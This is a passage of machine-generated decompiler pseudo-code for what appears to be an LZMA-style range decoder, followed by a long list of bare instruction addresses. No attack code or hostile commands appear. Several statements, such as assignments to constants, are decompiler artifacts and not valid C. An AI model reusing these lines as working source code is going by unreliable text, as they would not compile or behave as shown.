											__ecx =  *(__ebp - 0x28);
											 *(__ebp - 0x24) =  *(__ebp - 0x28);
											L89:
											__ecx =  *(__ebp - 0x2c);
											 *(__ebp - 0x2c) = __eax;
											 *(__ebp - 0x28) =  *(__ebp - 0x2c);
											L90:
											__eax =  *(__ebp - 4);
											 *(__ebp - 0x80) = 0x15;
											__eax =  *(__ebp - 4) + 0xa68;
											 *(__ebp - 0x58) =  *(__ebp - 4) + 0xa68;
											goto L69;
										case 0xc:
											L100:
											__eflags =  *(__ebp - 0x6c);
											if( *(__ebp - 0x6c) == 0) {
												 *(__ebp - 0x88) = 0xc;
												goto L170;
											}
											__ecx =  *(__ebp - 0x70);
											__eax =  *(__ebp - 0xc);
											 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
											__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
											 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
											 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											_t335 = __ebp - 0x70;
											 *_t335 =  *(__ebp - 0x70) + 1;
											__eflags =  *_t335;
											 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											__eax =  *(__ebp - 0x2c);
											goto L102;
										case 0xd:
											L37:
											__eflags =  *(__ebp - 0x6c);
											if( *(__ebp - 0x6c) == 0) {
												 *(__ebp - 0x88) = 0xd;
												goto L170;
											}
											__ecx =  *(__ebp - 0x70);
											__eax =  *(__ebp - 0xc);
											 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
											__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
											 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
											 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											_t122 = __ebp - 0x70;
											 *_t122 =  *(__ebp - 0x70) + 1;
											__eflags =  *_t122;
											 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											L39:
											__eax =  *(__ebp - 0x40);
											__eflags =  *(__ebp - 0x48) -  *(__ebp - 0x40);
											if( *(__ebp - 0x48) !=  *(__ebp - 0x40)) {
												goto L48;
											}
											__eflags = __ebx - 0x100;
											if(__ebx >= 0x100) {
												goto L54;
											}
											L41:
											__eax =  *(__ebp - 0x5b) & 0x000000ff;
											 *(__ebp - 0x5b) =  *(__ebp - 0x5b) << 1;
											__ecx =  *(__ebp - 0x58);
											__eax = ( *(__ebp - 0x5b) & 0x000000ff) >> 7;
											 *(__ebp - 0x48) = __eax;
											__eax = __eax + 1;
											__eax = __eax << 8;
											__eax = __eax + __ebx;
											__esi =  *(__ebp - 0x58) + __eax * 2;
											 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 0xb;
											__ax =  *__esi;
											 *(__ebp - 0x54) = __esi;
											__edx = __ax & 0x0000ffff;
											__ecx = ( *(__ebp - 0x10) >> 0xb) * __edx;
											__eflags =  *(__ebp - 0xc) - __ecx;
											if( *(__ebp - 0xc) >= __ecx) {
												 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
												 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
												__cx = __ax;
												 *(__ebp - 0x40) = 1;
												__cx = __ax >> 5;
												__eflags = __eax;
												__ebx = __ebx + __ebx + 1;
												 *__esi = __ax;
											} else {
												 *(__ebp - 0x40) =  *(__ebp - 0x40) & 0x00000000;
												 *(__ebp - 0x10) = __ecx;
												0x800 = 0x800 - __edx;
												0x800 - __edx >> 5 = (0x800 - __edx >> 5) + __eax;
												__ebx = __ebx + __ebx;
												 *__esi = __cx;
											}
											__eflags =  *(__ebp - 0x10) - 0x1000000;
											 *(__ebp - 0x44) = __ebx;
											if( *(__ebp - 0x10) >= 0x1000000) {
												goto L39;
											} else {
												goto L37;
											}
										case 0xe:
											L46:
											__eflags =  *(__ebp - 0x6c);
											if( *(__ebp - 0x6c) == 0) {
												 *(__ebp - 0x88) = 0xe;
												goto L170;
											}
											__ecx =  *(__ebp - 0x70);
											__eax =  *(__ebp - 0xc);
											 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
											__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
											 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
											 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											_t156 = __ebp - 0x70;
											 *_t156 =  *(__ebp - 0x70) + 1;
											__eflags =  *_t156;
											 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											while(1) {
												L48:
												__eflags = __ebx - 0x100;
												if(__ebx >= 0x100) {
													break;
												}
												__eax =  *(__ebp - 0x58);
												__edx = __ebx + __ebx;
												__ecx =  *(__ebp - 0x10);
												__esi = __edx + __eax;
												__ecx =  *(__ebp - 0x10) >> 0xb;
												__ax =  *__esi;
												 *(__ebp - 0x54) = __esi;
												__edi = __ax & 0x0000ffff;
												__ecx = ( *(__ebp - 0x10) >> 0xb) * __edi;
												__eflags =  *(__ebp - 0xc) - __ecx;
												if( *(__ebp - 0xc) >= __ecx) {
													 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
													 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
													__cx = __ax;
													_t170 = __edx + 1; // 0x1
													__ebx = _t170;
													__cx = __ax >> 5;
													__eflags = __eax;
													 *__esi = __ax;
												} else {
													 *(__ebp - 0x10) = __ecx;
													0x800 = 0x800 - __edi;
													0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
													__ebx = __ebx + __ebx;
													 *__esi = __cx;
												}
												__eflags =  *(__ebp - 0x10) - 0x1000000;
												 *(__ebp - 0x44) = __ebx;
												if( *(__ebp - 0x10) >= 0x1000000) {
													continue;
												} else {
													goto L46;
												}
											}
											L54:
											_t173 = __ebp - 0x34;
											 *_t173 =  *(__ebp - 0x34) & 0x00000000;
											__eflags =  *_t173;
											goto L55;
										case 0xf:
											L58:
											__eflags =  *(__ebp - 0x6c);
											if( *(__ebp - 0x6c) == 0) {
												 *(__ebp - 0x88) = 0xf;
												goto L170;
											}
											__ecx =  *(__ebp - 0x70);
											__eax =  *(__ebp - 0xc);
											 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
											__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
											 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
											 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											_t203 = __ebp - 0x70;
											 *_t203 =  *(__ebp - 0x70) + 1;
											__eflags =  *_t203;
											 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											L60:
											__eflags = __ebx - 0x100;
											if(__ebx >= 0x100) {
												L55:
												__al =  *(__ebp - 0x44);
												 *(__ebp - 0x5c) =  *(__ebp - 0x44);
												goto L56;
											}
											L61:
											__eax =  *(__ebp - 0x58);
											__edx = __ebx + __ebx;
											__ecx =  *(__ebp - 0x10);
											__esi = __edx + __eax;
											__ecx =  *(__ebp - 0x10) >> 0xb;
											__ax =  *__esi;
											 *(__ebp - 0x54) = __esi;
											__edi = __ax & 0x0000ffff;
											__ecx = ( *(__ebp - 0x10) >> 0xb) * __edi;
											__eflags =  *(__ebp - 0xc) - __ecx;
											if( *(__ebp - 0xc) >= __ecx) {
												 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
												 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
												__cx = __ax;
												_t217 = __edx + 1; // 0x1
												__ebx = _t217;
												__cx = __ax >> 5;
												__eflags = __eax;
												 *__esi = __ax;
											} else {
												 *(__ebp - 0x10) = __ecx;
												0x800 = 0x800 - __edi;
												0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
												__ebx = __ebx + __ebx;
												 *__esi = __cx;
											}
											__eflags =  *(__ebp - 0x10) - 0x1000000;
											 *(__ebp - 0x44) = __ebx;
											if( *(__ebp - 0x10) >= 0x1000000) {
												goto L60;
											} else {
												goto L58;
											}
										case 0x10:
											L110:
											__eflags =  *(__ebp - 0x6c);
											if( *(__ebp - 0x6c) == 0) {
												 *(__ebp - 0x88) = 0x10;
												goto L170;
											}
											__ecx =  *(__ebp - 0x70);
											__eax =  *(__ebp - 0xc);
											 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
											__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
											 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
											 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											_t366 = __ebp - 0x70;
											 *_t366 =  *(__ebp - 0x70) + 1;
											__eflags =  *_t366;
											 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											goto L112;
										case 0x11:
											L69:
											__esi =  *(__ebp - 0x58);
											 *(__ebp - 0x84) = 0x12;
											L132:
											 *(_t612 - 0x54) = _t605;
											goto L133;
										case 0x12:
											goto L0;
										case 0x13:
											__eflags =  *(__ebp - 0x40);
											if( *(__ebp - 0x40) != 0) {
												_t469 = __ebp - 0x58;
												 *_t469 =  *(__ebp - 0x58) + 0x204;
												__eflags =  *_t469;
												 *(__ebp - 0x30) = 0x10;
												 *(__ebp - 0x40) = 8;
												goto L144;
											}
											__eax =  *(__ebp - 0x4c);
											__ecx =  *(__ebp - 0x58);
											__eax =  *(__ebp - 0x4c) << 4;
											 *(__ebp - 0x30) = 8;
											__eax =  *(__ebp - 0x58) + ( *(__ebp - 0x4c) << 4) + 0x104;
											goto L130;
										case 0x14:
											 *(__ebp - 0x30) =  *(__ebp - 0x30) + __ebx;
											__eax =  *(__ebp - 0x80);
											L140:
											 *(_t612 - 0x88) = _t533;
											goto L1;
										case 0x15:
											__eax = 0;
											__eflags =  *(__ebp - 0x38) - 7;
											0 | __eflags >= 0x00000000 = (__eflags >= 0) - 1;
											__al = __al & 0x000000fd;
											__eax = (__eflags >= 0) - 1 + 0xb;
											 *(__ebp - 0x38) = (__eflags >= 0) - 1 + 0xb;
											goto L121;
										case 0x16:
											__eax =  *(__ebp - 0x30);
											__eflags = __eax - 4;
											if(__eax >= 4) {
												_push(3);
												_pop(__eax);
											}
											__ecx =  *(__ebp - 4);
											 *(__ebp - 0x40) = 6;
											__eax = __eax << 7;
											 *(__ebp - 0x7c) = 0x19;
											 *(__ebp - 0x58) = __eax;
											goto L145;
										case 0x17:
											goto L145;
										case 0x18:
											L146:
											__eflags =  *(__ebp - 0x6c);
											if( *(__ebp - 0x6c) == 0) {
												 *(__ebp - 0x88) = 0x18;
												goto L170;
											}
											__ecx =  *(__ebp - 0x70);
											__eax =  *(__ebp - 0xc);
											 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
											__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
											 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
											 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											_t484 = __ebp - 0x70;
											 *_t484 =  *(__ebp - 0x70) + 1;
											__eflags =  *_t484;
											 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											L148:
											_t487 = __ebp - 0x48;
											 *_t487 =  *(__ebp - 0x48) - 1;
											__eflags =  *_t487;
											goto L149;
										case 0x19:
											__eflags = __ebx - 4;
											if(__ebx < 4) {
												 *(__ebp - 0x2c) = __ebx;
												L120:
												_t394 = __ebp - 0x2c;
												 *_t394 =  *(__ebp - 0x2c) + 1;
												__eflags =  *_t394;
												L121:
												__eax =  *(__ebp - 0x2c);
												__eflags = __eax;
												if(__eax == 0) {
													 *(__ebp - 0x30) =  *(__ebp - 0x30) | 0xffffffff;
													goto L170;
												}
												__eflags = __eax -  *(__ebp - 0x60);
												if(__eax >  *(__ebp - 0x60)) {
													goto L171;
												}
												 *(__ebp - 0x30) =  *(__ebp - 0x30) + 2;
												__eax =  *(__ebp - 0x30);
												_t401 = __ebp - 0x60;
												 *_t401 =  *(__ebp - 0x60) +  *(__ebp - 0x30);
												__eflags =  *_t401;
												goto L124;
											}
											__ecx = __ebx;
											__eax = __ebx;
											__ecx = __ebx >> 1;
											__eax = __ebx & 0x00000001;
											__ecx = (__ebx >> 1) - 1;
											__al = __al | 0x00000002;
											__eax = (__ebx & 0x00000001) << __cl;
											__eflags = __ebx - 0xe;
											 *(__ebp - 0x2c) = __eax;
											if(__ebx >= 0xe) {
												__ebx = 0;
												 *(__ebp - 0x48) = __ecx;
												L103:
												__eflags =  *(__ebp - 0x48);
												if( *(__ebp - 0x48) <= 0) {
													__eax = __eax + __ebx;
													 *(__ebp - 0x40) = 4;
													 *(__ebp - 0x2c) = __eax;
													__eax =  *(__ebp - 4);
													__eax =  *(__ebp - 4) + 0x644;
													__eflags = __eax;
													L109:
													__ebx = 0;
													 *(__ebp - 0x58) = __eax;
													 *(__ebp - 0x50) = 1;
													 *(__ebp - 0x44) = 0;
													 *(__ebp - 0x48) = 0;
													L113:
													__eax =  *(__ebp - 0x40);
													__eflags =  *(__ebp - 0x48) -  *(__ebp - 0x40);
													if( *(__ebp - 0x48) >=  *(__ebp - 0x40)) {
														_t392 = __ebp - 0x2c;
														 *_t392 =  *(__ebp - 0x2c) + __ebx;
														__eflags =  *_t392;
														goto L120;
													}
													__eax =  *(__ebp - 0x50);
													 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 0xb;
													__edi =  *(__ebp - 0x50) +  *(__ebp - 0x50);
													__eax =  *(__ebp - 0x58);
													__esi = __edi + __eax;
													 *(__ebp - 0x54) = __esi;
													__ax =  *__esi;
													__ecx = __ax & 0x0000ffff;
													__edx = ( *(__ebp - 0x10) >> 0xb) * __ecx;
													__eflags =  *(__ebp - 0xc) - __edx;
													if( *(__ebp - 0xc) >= __edx) {
														__ecx = 0;
														 *(__ebp - 0x10) =  *(__ebp - 0x10) - __edx;
														__ecx = 1;
														 *(__ebp - 0xc) =  *(__ebp - 0xc) - __edx;
														__ebx = 1;
														__ecx =  *(__ebp - 0x48);
														__ebx = 1 << __cl;
														__ecx = 1 << __cl;
														__ebx =  *(__ebp - 0x44);
														__ebx =  *(__ebp - 0x44) | __ecx;
														__cx = __ax;
														__cx = __ax >> 5;
														__eax = __eax - __ecx;
														__edi = __edi + 1;
														__eflags = __edi;
														 *(__ebp - 0x44) = __ebx;
														 *__esi = __ax;
														 *(__ebp - 0x50) = __edi;
													} else {
														 *(__ebp - 0x10) = __edx;
														0x800 = 0x800 - __ecx;
														0x800 - __ecx >> 5 = (0x800 - __ecx >> 5) + __eax;
														 *(__ebp - 0x50) =  *(__ebp - 0x50) << 1;
														 *__esi = __dx;
													}
													__eflags =  *(__ebp - 0x10) - 0x1000000;
													if( *(__ebp - 0x10) >= 0x1000000) {
														L112:
														_t369 = __ebp - 0x48;
														 *_t369 =  *(__ebp - 0x48) + 1;
														__eflags =  *_t369;
														goto L113;
													} else {
														goto L110;
													}
												}
												__ecx =  *(__ebp - 0xc);
												__ebx = __ebx + __ebx;
												 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 1;
												__eflags =  *(__ebp - 0xc) -  *(__ebp - 0x10);
												 *(__ebp - 0x44) = __ebx;
												if( *(__ebp - 0xc) >=  *(__ebp - 0x10)) {
													__ecx =  *(__ebp - 0x10);
													 *(__ebp - 0xc) =  *(__ebp - 0xc) -  *(__ebp - 0x10);
													__ebx = __ebx | 0x00000001;
													__eflags = __ebx;
													 *(__ebp - 0x44) = __ebx;
												}
												__eflags =  *(__ebp - 0x10) - 0x1000000;
												if( *(__ebp - 0x10) >= 0x1000000) {
													L102:
													_t339 = __ebp - 0x48;
													 *_t339 =  *(__ebp - 0x48) - 1;
													__eflags =  *_t339;
													goto L103;
												} else {
													goto L100;
												}
											}
											__edx =  *(__ebp - 4);
											__eax = __eax - __ebx;
											 *(__ebp - 0x40) = __ecx;
											__eax =  *(__ebp - 4) + 0x55e + __eax * 2;
											goto L109;
										case 0x1a:
											L56:
											__eflags =  *(__ebp - 0x64);
											if( *(__ebp - 0x64) == 0) {
												 *(__ebp - 0x88) = 0x1a;
												goto L170;
											}
											__ecx =  *(__ebp - 0x68);
											__al =  *(__ebp - 0x5c);
											__edx =  *(__ebp - 8);
											 *(__ebp - 0x60) =  *(__ebp - 0x60) + 1;
											 *(__ebp - 0x68) =  *(__ebp - 0x68) + 1;
											 *(__ebp - 0x64) =  *(__ebp - 0x64) - 1;
											 *( *(__ebp - 0x68)) = __al;
											__ecx =  *(__ebp - 0x14);
											 *(__ecx +  *(__ebp - 8)) = __al;
											__eax = __ecx + 1;
											__edx = 0;
											_t192 = __eax %  *(__ebp - 0x74);
											__eax = __eax /  *(__ebp - 0x74);
											__edx = _t192;
											goto L80;
										case 0x1b:
											L76:
											__eflags =  *(__ebp - 0x64);
											if( *(__ebp - 0x64) == 0) {
												 *(__ebp - 0x88) = 0x1b;
												goto L170;
											}
											__eax =  *(__ebp - 0x14);
											__eax =  *(__ebp - 0x14) -  *(__ebp - 0x2c);
											__eflags = __eax -  *(__ebp - 0x74);
											if(__eax >=  *(__ebp - 0x74)) {
												__eax = __eax +  *(__ebp - 0x74);
												__eflags = __eax;
											}
											__edx =  *(__ebp - 8);
											__cl =  *(__eax + __edx);
											__eax =  *(__ebp - 0x14);
											 *(__ebp - 0x5c) = __cl;
											 *(__eax + __edx) = __cl;
											__eax = __eax + 1;
											__edx = 0;
											_t275 = __eax %  *(__ebp - 0x74);
											__eax = __eax /  *(__ebp - 0x74);
											__edx = _t275;
											__eax =  *(__ebp - 0x68);
											 *(__ebp - 0x60) =  *(__ebp - 0x60) + 1;
											 *(__ebp - 0x68) =  *(__ebp - 0x68) + 1;
											_t284 = __ebp - 0x64;
											 *_t284 =  *(__ebp - 0x64) - 1;
											__eflags =  *_t284;
											 *( *(__ebp - 0x68)) = __cl;
											L80:
											 *(__ebp - 0x14) = __edx;
											goto L81;
										case 0x1c:
											while(1) {
												L124:
												__eflags =  *(__ebp - 0x64);
												if( *(__ebp - 0x64) == 0) {
													break;
												}
												__eax =  *(__ebp - 0x14);
												__eax =  *(__ebp - 0x14) -  *(__ebp - 0x2c);
												__eflags = __eax -  *(__ebp - 0x74);
												if(__eax >=  *(__ebp - 0x74)) {
													__eax = __eax +  *(__ebp - 0x74);
													__eflags = __eax;
												}
												__edx =  *(__ebp - 8);
												__cl =  *(__eax + __edx);
												__eax =  *(__ebp - 0x14);
												 *(__ebp - 0x5c) = __cl;
												 *(__eax + __edx) = __cl;
												__eax = __eax + 1;
												__edx = 0;
												_t415 = __eax %  *(__ebp - 0x74);
												__eax = __eax /  *(__ebp - 0x74);
												__edx = _t415;
												__eax =  *(__ebp - 0x68);
												 *(__ebp - 0x68) =  *(__ebp - 0x68) + 1;
												 *(__ebp - 0x64) =  *(__ebp - 0x64) - 1;
												 *(__ebp - 0x30) =  *(__ebp - 0x30) - 1;
												__eflags =  *(__ebp - 0x30);
												 *( *(__ebp - 0x68)) = __cl;
												 *(__ebp - 0x14) = _t415;
												if( *(__ebp - 0x30) > 0) {
													continue;
												} else {
													L81:
													 *(__ebp - 0x88) = 2;
													goto L1;
												}
											}
											 *(__ebp - 0x88) = 0x1c;
											L170:
											_push(0x22);
											_pop(_t567);
											memcpy( *(_t612 - 0x90), _t612 - 0x88, _t567 << 2);
											_t535 = 0;
											L172:
											return _t535;
									}
								}
								L171:
								_t535 = _t534 | 0xffffffff;
								goto L172;
							}
						}
						__eax =  *(__ebp - 0x50);
						 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 0xb;
						__edx =  *(__ebp - 0x50) +  *(__ebp - 0x50);
						__eax =  *(__ebp - 0x58);
						__esi = __edx + __eax;
						 *(__ebp - 0x54) = __esi;
						__ax =  *__esi;
						__edi = __ax & 0x0000ffff;
						__ecx = ( *(__ebp - 0x10) >> 0xb) * __edi;
						if( *(__ebp - 0xc) >= __ecx) {
							 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
							 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
							__cx = __ax;
							__cx = __ax >> 5;
							__eax = __eax - __ecx;
							__edx = __edx + 1;
							 *__esi = __ax;
							 *(__ebp - 0x50) = __edx;
						} else {
							 *(__ebp - 0x10) = __ecx;
							0x800 = 0x800 - __edi;
							0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
							 *(__ebp - 0x50) =  *(__ebp - 0x50) << 1;
							 *__esi = __cx;
						}
						if( *(__ebp - 0x10) >= 0x1000000) {
							goto L148;
						} else {
							goto L146;
						}
					}
					goto L1;
				}
			}








                                                  0x00000000
                                                  0x0040680a
                                                  0x0040680a
                                                  0x0040680e
                                                  0x00406833
                                                  0x0040683d
                                                  0x00000000
                                                  0x00406810
                                                  0x00406810
                                                  0x00406813
                                                  0x00406817
                                                  0x0040681a
                                                  0x0040681d
                                                  0x00406821
                                                  0x00406821
                                                  0x00406824
                                                  0x004068fe
                                                  0x004068fe
                                                  0x00406905
                                                  0x00406905
                                                  0x00406908
                                                  0x0040690f
                                                  0x0040693c
                                                  0x00406940
                                                  0x004069a0
                                                  0x004069a3
                                                  0x004069a8
                                                  0x004069a9
                                                  0x004069ab
                                                  0x004069ad
                                                  0x004069b0
                                                  0x004068bc
                                                  0x004068bc
                                                  0x004068bc
                                                  0x00406058
                                                  0x00406058
                                                  0x00406058
                                                  0x00406061
                                                  0x00000000
                                                  0x00000000
                                                  0x00406067
                                                  0x00000000
                                                  0x00406072
                                                  0x00000000
                                                  0x00000000
                                                  0x0040607b
                                                  0x0040607e
                                                  0x00406081
                                                  0x00406085
                                                  0x00000000
                                                  0x00000000
                                                  0x0040608b
                                                  0x0040608e
                                                  0x00406090
                                                  0x00406091
                                                  0x00406094
                                                  0x00406096
                                                  0x00406097
                                                  0x00406099
                                                  0x0040609c
                                                  0x004060a1
                                                  0x004060a6
                                                  0x004060af
                                                  0x004060c2
                                                  0x004060c5
                                                  0x004060d1
                                                  0x004060f9
                                                  0x004060fb
                                                  0x00406109
                                                  0x00406109
                                                  0x0040610d
                                                  0x00000000
                                                  0x00000000
                                                  0x00000000
                                                  0x00000000
                                                  0x004060fd
                                                  0x004060fd
                                                  0x00406100
                                                  0x00406101
                                                  0x00406101
                                                  0x00000000
                                                  0x004060fd
                                                  0x004060d7
                                                  0x004060dc
                                                  0x004060dc
                                                  0x004060e5
                                                  0x004060ed
                                                  0x004060f0
                                                  0x00000000
                                                  0x004060f6
                                                  0x004060f6
                                                  0x00000000
                                                  0x004060f6
                                                  0x00000000
                                                  0x00406113
                                                  0x00406113
                                                  0x00406117
                                                  0x004069c3
                                                  0x00000000
                                                  0x004069c3
                                                  0x00406120
                                                  0x00406130
                                                  0x00406133
                                                  0x00406136
                                                  0x00406136
                                                  0x00406136
                                                  0x00406139
                                                  0x0040613d
                                                  0x00000000
                                                  0x00000000
                                                  0x0040613f
                                                  0x00406145
                                                  0x0040616f
                                                  0x00406175
                                                  0x0040617c
                                                  0x00000000
                                                  0x0040617c
                                                  0x0040614b
                                                  0x0040614e
                                                  0x00406153
                                                  0x00406153
                                                  0x0040615e
                                                  0x00406166
                                                  0x00406169
                                                  0x00000000
                                                  0x00000000
                                                  0x00000000
                                                  0x00000000
                                                  0x00000000
                                                  0x004061ae
                                                  0x004061b4
                                                  0x004061b7
                                                  0x004061c4
                                                  0x004061cc
                                                  0x00000000
                                                  0x00000000
                                                  0x00406183
                                                  0x00406183
                                                  0x00406187
                                                  0x004069d2
                                                  0x00000000
                                                  0x004069d2
                                                  0x00406193
                                                  0x0040619e
                                                  0x0040619e
                                                  0x0040619e
                                                  0x004061a1
                                                  0x004061a4
                                                  0x004061a7
                                                  0x004061ac
                                                  0x00000000
                                                  0x00000000
                                                  0x00000000
                                                  0x00000000
                                                  0x00406843
                                                  0x00406843
                                                  0x00406849
                                                  0x0040684f
                                                  0x00406855
                                                  0x0040686f
                                                  0x00406872
                                                  0x00406878
                                                  0x00406883
                                                  0x00406883
                                                  0x00406885
                                                  0x00406857
                                                  0x00406857
                                                  0x00406866
                                                  0x0040686a
                                                  0x0040686a
                                                  0x0040688f
                                                  0x00000000
                                                  0x00000000
                                                  0x00000000
                                                  0x00000000
                                                  0x00000000
                                                  0x00406891
                                                  0x00406895
                                                  0x00406a44
                                                  0x00000000
                                                  0x00406a44
                                                  0x004068a1
                                                  0x004068a8
                                                  0x004068b0
                                                  0x004068b3
                                                  0x004068b6
                                                  0x004068b6
                                                  0x00000000
                                                  0x00000000
                                                  0x004061d4
                                                  0x004061d6
                                                  0x004061d9
                                                  0x0040624a
                                                  0x0040624d
                                                  0x00406250
                                                  0x00406257
                                                  0x00406261
                                                  0x00000000
                                                  0x00406261
                                                  0x004061db
                                                  0x004061df
                                                  0x004061e2
                                                  0x004061e4
                                                  0x004061e7
                                                  0x004061ea
                                                  0x004061ec
                                                  0x004061ef
                                                  0x004061f1
                                                  0x004061f6
                                                  0x004061f9
                                                  0x004061fc
                                                  0x00406200
                                                  0x00406207
                                                  0x0040620a
                                                  0x00406211
                                                  0x00406215
                                                  0x0040621d
                                                  0x0040621d
                                                  0x0040621d
                                                  0x00406217
                                                  0x00406217
                                                  0x00406217
                                                  0x0040620c
                                                  0x0040620c
                                                  0x0040620c
                                                  0x00406221
                                                  0x00406224
                                                  0x00406242
                                                  0x00406244
                                                  0x00000000
                                                  0x00406226
                                                  0x00406226
                                                  0x00406229
                                                  0x0040622c
                                                  0x0040622f
                                                  0x00406231
                                                  0x00406231
                                                  0x00406231
                                                  0x00406234
                                                  0x00406237
                                                  0x00406239
                                                  0x0040623a
                                                  0x0040623d
                                                  0x00000000
                                                  0x0040623d
                                                  0x00000000
                                                  0x00406473
                                                  0x00406477
                                                  0x00406495
                                                  0x00406498
                                                  0x0040649f
                                                  0x004064a2
                                                  0x004064a5
                                                  0x004064a8
                                                  0x004064ab
                                                  0x004064ae
                                                  0x004064b0
                                                  0x004064b7
                                                  0x004064b8
                                                  0x004064ba
                                                  0x004064bd
                                                  0x004064c0
                                                  0x004064c3
                                                  0x004064c3
                                                  0x004064c8
                                                  0x00000000
                                                  0x004064c8
                                                  0x00406479
                                                  0x0040647c
                                                  0x0040647f
                                                  0x00406489
                                                  0x00000000
                                                  0x00000000
                                                  0x004064dd
                                                  0x004064e1
                                                  0x00406504
                                                  0x00406507
                                                  0x0040650a
                                                  0x00406514
                                                  0x004064e3
                                                  0x004064e3
                                                  0x004064e6
                                                  0x004064e9
                                                  0x004064ec
                                                  0x004064f9
                                                  0x004064fc
                                                  0x004064fc
                                                  0x00000000
                                                  0x00000000
                                                  0x00406520
                                                  0x00406524
                                                  0x00000000
                                                  0x00000000
                                                  0x0040652a
                                                  0x0040652e
                                                  0x00000000
                                                  0x00000000
                                                  0x00406534
                                                  0x00406536
                                                  0x0040653a
                                                  0x0040653a
                                                  0x0040653d
                                                  0x00406541
                                                  0x00000000
                                                  0x00000000
                                                  0x00406591
                                                  0x00406595
                                                  0x0040659c
                                                  0x0040659f
                                                  0x004065a2
                                                  0x004065ac
                                                  0x00000000
                                                  0x004065ac
                                                  0x00406597
                                                  0x00000000
                                                  0x00000000
                                                  0x004065b8
                                                  0x004065bc
                                                  0x004065c3
                                                  0x004065c6
                                                  0x004065c9
                                                  0x004065be
                                                  0x004065be
                                                  0x004065be
                                                  0x004065cc
                                                  0x004065cf
                                                  0x004065d2
                                                  0x004065d2
                                                  0x004065d5
                                                  0x004065d8
                                                  0x004065db
                                                  0x004065db
                                                  0x004065de
                                                  0x004065e5
                                                  0x004065ea
                                                  0x00000000
                                                  0x00000000
                                                  0x00406678
                                                  0x00406678
                                                  0x0040667c
                                                  0x00406a1a
                                                  0x00000000
                                                  0x00406a1a
                                                  0x00406682
                                                  0x00406685
                                                  0x00406688
                                                  0x0040668c
                                                  0x0040668f
                                                  0x00406695
                                                  0x00406697
                                                  0x00406697
                                                  0x00406697
                                                  0x0040669a
                                                  0x0040669d
                                                  0x00000000
                                                  0x00000000
                                                  0x0040626d
                                                  0x0040626d
                                                  0x00406271
                                                  0x004069de
                                                  0x00000000
                                                  0x004069de
                                                  0x00406277
                                                  0x0040627a
                                                  0x0040627d
                                                  0x00406281
                                                  0x00406284
                                                  0x0040628a
                                                  0x0040628c
                                                  0x0040628c
                                                  0x0040628c
                                                  0x0040628f
                                                  0x00406292
                                                  0x00406292
                                                  0x00406295
                                                  0x00406298
                                                  0x00000000
                                                  0x00000000
                                                  0x0040629e
                                                  0x004062a4
                                                  0x00000000
                                                  0x00000000
                                                  0x004062aa
                                                  0x004062aa
                                                  0x004062ae
                                                  0x004062b1
                                                  0x004062b4
                                                  0x004062b7
                                                  0x004062ba
                                                  0x004062bb
                                                  0x004062be
                                                  0x004062c0
                                                  0x004062c6
                                                  0x004062c9
                                                  0x004062cc
                                                  0x004062cf
                                                  0x004062d2
                                                  0x004062d5
                                                  0x004062d8
                                                  0x004062f4
                                                  0x004062f7
                                                  0x004062fa
                                                  0x004062fd
                                                  0x00406304
                                                  0x00406308
                                                  0x0040630a
                                                  0x0040630e
                                                  0x004062da
                                                  0x004062da
                                                  0x004062de
                                                  0x004062e6
                                                  0x004062eb
                                                  0x004062ed
